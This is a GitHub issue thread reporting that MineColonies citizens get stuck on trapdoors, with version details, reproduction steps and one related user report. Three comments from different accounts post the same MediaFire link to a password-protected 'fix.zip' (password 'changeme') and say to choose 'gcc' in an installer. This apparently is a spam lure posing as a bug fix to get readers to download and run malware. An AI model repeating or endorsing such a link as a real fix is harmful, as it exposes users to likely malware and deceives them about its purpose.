### ISSUE TITLE
[BUG] Citizens sometimes can't pass through trapdoors.

### ISSUE THREAD

**Issue by fulmoonless** [ldtteam/minecolonies#10169]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Are you using the latest MineColonies Version?

- [X] I am running the latest **beta** version of MineColonies for my Minecraft version.

### Did you check on the Wiki? or ask on Discord?

- [X] I checked the MineColonies Wiki and made sure my issue is not covered there. Or I was sent from discord to open an issue here.

### What were you playing at the time? Were you able to reproduce it in both settings?

- [X] Single Player
- [ ] Multi Player

### Minecraft Version

1.20.1

### MineColonies Version

1.20.1-1.1.628

### Structurize Version

1.20.1-1.0.742

### Related Mods and their Versions

Minecolonies Offical WinterColonies-1.11

### Current Behavior

It seems the pathing system is getting blocked by trapdoors.
![image](https://github.com/user-attachments/assets/d9b54b05-75bd-4c78-a337-253c9f341293)
![image](https://github.com/user-attachments/assets/b39cbccf-4ad1-45e7-a5a2-82319f52f9b4)

### Expected Behavior

Don't blocked by trapdoors.

### Reproduction Steps

1. Build a lot of level 3 Colonial residences. 
2. Block the doors to the second floor. 
3. They will get stuck on the second floor one day. 
(This happens quite often in my 50-person colony.)

### Logs

No crash

### Anything else?

* Add a thumbs-up to the bug report if you are also affected. This helps the bug report become more visible to the team and doesn't clutter the comments.
* Add a comment if you have any insights or background information that isn't already part of the conversation.

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by billjk2013** [comment]
My issue is likely related as I am having issues with my builder Colonists building a medium quarry they are getting stuck on trap doors. I'm playing all the mods 9.
Minecraft version 1.20.1
Mine Colonies version 1.20.1-1.1.647
Structurize version 1.20.1-1.0.755
